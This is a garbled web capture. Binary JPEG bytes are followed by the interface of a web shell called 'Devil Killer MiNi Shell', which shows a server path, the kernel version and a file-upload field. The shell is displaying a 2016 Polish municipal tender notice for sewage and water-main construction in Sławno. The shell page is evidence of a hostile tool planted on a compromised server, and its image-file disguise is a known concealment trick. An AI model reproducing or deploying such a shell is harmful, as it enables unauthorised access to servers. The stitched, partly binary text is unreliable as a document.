JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160518/125426-N-2016.html

<p class="kh_header"><b>Sławno: Realizacja Projektu pn. Uzbrojenie terenów w miejscowości Kozenin - Gmina Sławno pod potrzeby inwestycji MŚP</b><br>
<b>Numer ogłoszenia: 125426 - 2016; data zamieszczenia: 18.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sławno , ul. Marszałka Józefa Piłsudskiego 31, 26-332 Sławno, woj. łódzkie, tel. 44 755-18-50, faks 44 755-18-51.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.ugslawno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja Projektu pn. Uzbrojenie terenów w miejscowości Kozenin - Gmina Sławno pod potrzeby inwestycji MŚP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest realizacja Projektu pn. 

    Uzbrojenie terenów w miejscowości Kozenin  Gmina Sławno pod potrzeby inwestycji
     MŚP
      
1.	Zakres rzeczowy inwestycji

1.1.	Zadanie 1
 Kanalizacja sanitarna
  a)  budowa  rurociągów tłocznych   dł.   1633,7 mb, 
  b)  budowa kanałów grawitacyjnych   dł.   5671,7 mb.
  c)  budowa przepompowni ścieków PS 7, PS 8 , PS31 z zasilaniem energetycznym ( WLZ)
    2. 2.  Zadanie 2:
Sieć wodociągowa
a) budowa sieci wodociągowej  dł. sieci 3050,26 mb, 
b) wykonanie węzła  automatycznego napełniania zbiorników wody,
c) wykonanie awaryjnego  zasilania energetycznego  ujęcia wody Sepno  Radonia
d) budowa przyłącza  dł.   46,45 m,
Wyszczególnienie zakresu rzeczowego
L.p.	Wyszczególnienie zakresu rzeczowego
1.	Kanalizacja sanitarna:
1.1	Zlewnia PS7cz. Sanitarna
1.2	Przepompownia ścieków PS7cz. Elektryczna
1.3	Zlewnia PS8  cz. Sanitarna
1.4	Przepompownia ścieków PS8  cz. Elektryczna
1.5	Zlewnia PS31cz. Sanitarna
1.6.	Przepompownia ścieków PS31cz. Elektryczna
1.7	Kanalizacja grawitacyjna włączenie do zlewni istn.  cz. Sanitarna
2.	Sieć wodociągowa, automatyczny węzeł napełniania zbiorników wody, awaryjne zasilanie energ.  ujęcia wody
2.1	Wodociąg Kozenin Sepno
2.2	Przyłącze wodociągowe
3.Szczegółowy zakres robót opisany został w dokumentacji technicznej, specyfikacji technicznej 
   wykonania i odbioru robót budowlanych.
UWAGA
Do ceny oferty należy doliczyć koszt wykonania ogrodzenia przepompowni ścieków PS7,  PS8, PS31 o wymiarach 4 razy 4 mb i wysokości h równa się 1,5 m z furtką wejściową o szerokości 0.90 m wykonane 
z paneli ogrodzeniowych (drut gr. 0,4 cm) malowanych proszkowo  brak opisu w dokumentacji  technicznej,
 oraz
Zakup  i montaż agregatu prądotwórczego 10 kVA w obudowie dźwiękochłonnej na podwoziu przyczepy  przetaczany ze stabilizacją napięcia diesel pkt 2.3.12  poz. 134 143 przedmiaru  wodociąg Kozenin Sepno brak opisu w dokumentacji  technicznej.
4. Wykonawca zobowiązuje się do wykonania przedmiotu umowy zgodnie z opisem technicznym ,  specyfikacją technicznego wykonania i odbioru robót budowlanych, zasadami wiedzy 
technicznej i sztuki budowlanej, obowiązującymi przepisami i polskimi normami. 

5.  Wykonawca zobowiązany jest  w ramach  ww  robót  do:

1)	Wykonania   przedmiotu   zamówienia   zgodnie  z  dokumentacją projektową, pozwoleniem na budowę, technologią wskazaną przez Projektanta, z zasadami wiedzy technicznej, wskazaniami Zamawiającego oraz obowiązującymi przepisami, w szczególności z zapisami zawartymi 
w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych, załączonymi do niniejszej specyfikacji.

2)	Wykonania Projektów Organizacji Ruchu   na bieżąco przez Wykonawcę w miarę postępu robót. Wykonania, oznakowania  w czasie trwania robót oraz demontażu po wykonaniu robót.
 
3)	Zabezpieczenia składowanych tymczasowo na placu  budowy materiałów i urządzeń do czasu 
ich wbudowania przed zniszczeniem lub utratą jakości, właściwości lub parametrów.

4)	Zorganizowania zaplecza budowy, podłączenia mediów we własnym zakresie i na swój koszt oraz pokrycia kosztów ich eksploatacji przez cały okres trwania budowy.

5)	Zabezpieczenia terenu robót na czas ich wykonywania przed osobami postronnymi, 
a w szczególności do przeciwdziałania wypadkom z udziałem osób trzecich. Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody wyrządzone osobom  trzecim w wyniku prowadzonych prac, 
od dnia przekazania placu budowy do dnia odbioru robót. 

6)	Natychmiastowego usunięcia w sposób docelowy wszelkich szkód i awarii spowodowanych przez Wykonawcę w trakcie realizacji robót.

7)	Pokrycia kosztów związanych z bieżącą obsługą geodezyjną inwestycji, w tym odtworzenia na swój koszt  znaków osnowy geodezyjnej w przypadku gdy ww znaki znajdują się na terenie realizacji robót.

8)	Wykonawca jako wytwórca odpadów w rozumieniu ustawy o odpadach ma obowiązek
    zagospodarowania powstałych podczas realizacji zadania odpadów zgodnie z ustawą o odpadach 
    z dnia 14 grudnia 2012 o odpadach (Dz. U. z 2013 r. poz. 21 ze zm. ), i ustawą z dnia 27 kwietnia
    2001r. Prawo ochrony środowiska ( Dz. U. z 2013 r. poz. 1232 ze zm.) oraz zgłoszenia 
    informacji o wytwarzanych odpadach, sposobie ich zagospodarowania do Wydziału Ochrony 
    Środowiska Starostwa Powiatowego z kopią do wiadomości Zamawiającego. W cenie oferty 
    Wykonawca ma obowiązek uwzględnić odległość, koszt wywozu i utylizacji odpadów.

9)	Prowadzenia robót rozbiórkowych, montażowych i budowlanych zgodnie z wymogami rozporządzenia Ministra Infrastruktury z dnia 6 lutego 2003 r. w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót budowlanych (Dz. U. z 2003 r. nr 47 poz. 401).


10)	 Sporządzenia i przekazania Zamawiającemu planu bezpieczeństwa i ochrony zdrowia, sporządzonego zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji   dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia
(Dz. U. z 2003r. Nr 120, poz. 1126). Przekazanie planu BiOZ winno nastąpić w ciągu 14 dni od daty przekazania placu budowy.

11)	 Wykonania inwentaryzacji geodezyjnej powykonawczej. 

12)	Wykonania próby szczelności rurociągów kanalizacji sanitarnej zgodnie z PN-EN 1610, 
z której należy sporządzić protokół z udziałem inspektora nadzoru inwestorskiego.

13)	Wykonania kamerowania sieci grawitacyjnej całego zakresu robót wraz z wydrukiem i płytą.

14)	Sporządzenia w dwóch egzemplarzach instrukcji eksploatacji dla przepompowni oraz przekazania ich Zamawiającemu w dniu podpisania protokołu odbioru końcowego.

15)	Odbudowy nawierzchni dróg w przypadku, gdy podczas wykonywania prac budowy w przejściach pod jezdniami oraz w pasie drogi  nawierzchnia zostanie uszkodzona.
  

16)	Uwzględnienia kosztów związanych z zajęciem pasa drogowego podczas realizacji robót (droga krajowa, powiatowa, gminna).

17)	Przekazania Zamawiającemu dokumentacji powykonawczej po sprawdzeniu jej kompletności przez Inspektora  Nadzoru, najpóźniej w terminie do dnia podpisania protokołu odbioru końcowego. Wykonawca zobowiązany jest do sporządzenia i przekazania kompleksowej geodezyjnej inwentaryzacji powykonawczej przyjętej do zasobów przez Powiatowy Ośrodek Geodezji (w 3 egzemplarzach) najpóźniej  do dnia podpisania protokołu odbioru końcowego.

18)	Materiały, urządzenia i wyposażenie użyte do wykonania przedmiotu zamówienia muszą być dopuszczone do stosowania na terenie RP oraz spełniać warunki określone w ustawie 
z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. z 2014 r. poz. 883 ze zm. )
oraz m.in. w Rozporządzeniu Ministra Infrastruktury w sprawie sposobów deklarowania zgodności   wyrobów   budowlanych   oraz   sposobu   znakowania   ich   znakiem budowlanym z 11 sierpnia 2004 r. ( Dz. U. z 2004 r., Nr 198, poz. 2041 ze zm. ). 

19)	Wszystkie nazwy  własne urządzeń i materiałów użyte w dokumentacji przetargowej,  określają  minimalne oczekiwane parametry jakościowe, techniczne oraz wymagany standard, należy
je traktować jako propozycje projektanta.  

a)	  Jeżeli dokumentacja  projektowa lub specyfikacja techniczna wykonania i odbioru robót  budowlanych wskazywałaby w odniesieniu do niektórych materiałów lub urządzeń znaki towarowe, patenty lub pochodzenie - Zamawiający, zgodnie z art. 29 ust. 3 ustawy Pzp, dopuszcza oferowanie materiałów lub urządzeń równoważnych. Materiały lub urządzenia pochodzące 
od konkretnych producentów określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać materiały lub urządzenia oferowane przez wykonawcę, aby zostały spełnione wymagania stawiane przez Zamawiającego. Materiały lub urządzenia pochodzące od konkretnych  producentów stanowią wyłącznie wzorzec jakościowy przedmiotu zamówienia.
b)Pod pojęciem minimalne parametry  jakościowe i cechy użytkowe Zamawiający rozumie wymagania dotyczące materiałów lub urządzeń zawarte w ogólnie dostępnych źródłach katalogowych, stronach internetowych producentów. Posługiwanie się nazwami producentów produktów ma wyłącznie charakter przykładowy. Zamawiający wskazując oznaczenie  konkretnego  producenta (dostawcy) lub konkretny produkt  przy opisie przedmiotu zamówienia, dopuszcza jednocześnie produkty równoważne o parametrach  jakościowych i cechach użytkowych 
co najmniej na poziomie parametrów wskazanego produktu, uznając tym samym każdy produkt 
o wskazanych lub lepszych parametrach.
20)	Dopuszcza się stosowanie materiałów i urządzeń równoważnych, jednak ich parametry techniczne muszą odpowiadać  zaproponowanym w dokumentacji projektowej.

21) Obowiązek udowodnienia równoważności ciąży na Wykonawcy zgodnie z art. 30 ust 5 ustawy Prawo 
        zamówień publicznych.  

22) Wykonawca przedłoży Zamawiającemu dokumenty potwierdzające, iż wszystkie wyroby budowlane użyte do wykonania zamówienia nadają się do stosowania przy wykonywaniu robót budowlanych.

23)   Wykonawca ma obowiązek posiadać w stosunku do użytych materiałów i urządzeń dokumenty 
          potwierdzające pozwolenie na zastosowanie/wbudowanie (atesty, certyfikaty, aprobaty 
         techniczne, świadectwa jakości itp.). 

24) Wykonawca  przygotuje oraz złoży w formie spiętej wszelkie dokumenty za wykonany 
         przedmiot zamówienia, a zwłaszcza : 

a) 	dokumenty gwarancyjne wraz z warunkami gwarancji wszystkich zamontowanych urządzeń, 
b)  protokoły z badania materiałów i urządzeń, 
c)  dokumenty potwierdzające jakość materiałów i urządzeń użytych do wykonania przedmiotu  
   zamówienia, 
d) inne dokumenty zgromadzone w trakcie wykonywania przedmiotu zamówienia,  a odnoszące 
    się do jego realizacji, zwłaszcza rysunki z naniesionymi zmianami w trakcie  realizacji zadania.,
e) inwentaryzację geodezyjną  powykonawczą,
f)  wypełniony dziennik budowy
g) pozwolenia na użytkowanie 
25) Wykonawca zaopatrzy obiekty przepompowni w oznaczenia i instrukcje wymagane obowiązującymi przepisami ( p.poż., sanitarne, bhp ). 


Wyklucza się możliwość roszczeń Wykonawcy związanych z błędnym skalkulowaniem ceny lub pominięciem elementów niezbędnych do prawidłowego wykonania umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.10-9, 45.23.24.23-3, 45.31.12.00-2, 45.23.21.50-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 78 000,00 PLN 
( słownie: siedemdziesiąt osiem tysięcy złotych  PLN)
  2.  Wadium  musi być wniesione  przed upływem terminu składania ofert.
  3. Wadium może być wniesione  w jednej lub kilku następujących formach w zależności od wyboru
      Wykonawcy:
	1)	pieniądzu - przelewem na rachunek bankowy  NR  05 8992 0000 0007 8432 2000 0030
       z dopiskiem  - 
Realizacja projektu pn. Uzbrojenie terenów w miejscowości Kozenin - Gmina 


Sławno pod potrzeby inwestycji MŚP

Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć 
do oferty. 

         Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany 
  przez Zamawiającego rachunek bankowy najpóźniej do dnia i godziny  składania ofert.
	2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
	3)	gwarancjach bankowych;
	4)	gwarancjach ubezpieczeniowych;
	5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r. poz. 1804 oraz z 2015 r. poz. 978 i 1240).
należy w formie nienaruszonego oryginału zdeponować w sekretariacie Urzędu Gminy Sławno pokój Nr 13 , a kopię potwierdzoną za zgodność z oryginałem należy dołączyć do oferty. 

4. Z treści powinno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez 
      zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty 
      zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 
      5 ustawy Prawo zamówień publicznych. 

5. Wadium składane przez Konsorcjum w formie poręczeń lub gwarancji ma wskazywać   
     Lidera Konsorcjum i pozostałych konsorcjantów.

 6. Gwarancja lub poręczenie wadium musi dodatkowo zawierać klauzulę wypłaty kwoty  
      wadialnej Zamawiającemu, zarówno wówczas gdy Lider Konsorcjum uchyli się od 
      zawarcia umowy z Zamawiającym w przypadku gdy zostanie wybrana oferta 
      Konsorcjum, jak i wtedy, gdy od zawarcia umowy uchyli się którykolwiek z pozostałych  
     członków Konsorcjum.
7.  Zwrot wadium,  
1.  Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a upzp.
1a.  Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
2.  Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
3.  Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
4. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
8. Zgodnie z art. 46 ust. 4a i 5 ustawy Prawo zamówień Zamawiający zatrzymuje wadium wraz 
z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, 
z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa 
w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej,
 o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej,
lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
9. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została 
    wybrana:
	1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w ofercie;
	2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
	3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
10. Oferta w trakcie trwania procedury przetargowej od dnia składania ofert do dnia podpisania 
       umowy (termin związania ofertą 30 dni) winna być przez cały okres zabezpieczona wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b) Potencjał kadrowy
 o zamówienie mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować  następującymi osobami,  które po stronie Wykonawcy będą kierować wykonaniem  zamówienia, mającymi doświadczenie zawodowe, minimum 5 lat i posiadającymi  n/w uprawnienia do wykonywania  samodzielnych funkcji  technicznych   w  budownictwie:

1) Kierownika budowy - 1 osoba posiadająca:
      a) uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: 
     cieplnych,  wentylacyjnych,  gazowych,  wodociągowych i kanalizacyjnych
oraz 1 osoba posiadająca:
   b) uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń:   
         elektrycznych  i elektroenergetycznych 
Nie należy łączyć funkcji poszczególnych kierowników .

    Wyżej wymieniona  osoba powinna legitymować się uprawnieniami budowlanymi do kierowania robotami budowlanymi wymaganymi przepisami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2016 r. poz. 290 )( lub odpowiadające im równoważne uprawnienia budowlane 
do kierowania robotami we właściwej branży i zakresie, które zostały  wydane na podstawie  wcześniej obowiązujących przepisów tj. przed 01.01.1995 r.  ) oraz zgodnie z Rozporządzeniem Ministra Infrastruktury i Rozwoju  z dnia 11 września 2014  r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. poz. 1278). 
      Dla  wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej  określone Obwieszczeniem Ministra Infrastruktury z dnia 16 lutego 2009 r. w sprawie wykazu dyplomów i innych dokumentów, wydawanych przez inne niż Rzeczpospolita Polska państwa członkowskie Unii Europejskiej, Konfederację Szwajcarską, państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA) - strony umowy o Europejskim Obszarze Gospodarczym, potwierdzających posiadanie kwalifikacji do wykonywania zawodu architekta oraz terminów, 
w których odbywało się kształcenie.  Powyższe  zagadnienie reguluje  Ustawa z dnia
22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej  (Dz. U. z 2016 r. poz. 65).
 Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają ww warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony wówczas, gdy Wykonawca złoży oświadczenie 
z art. 22 ust. 1 ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

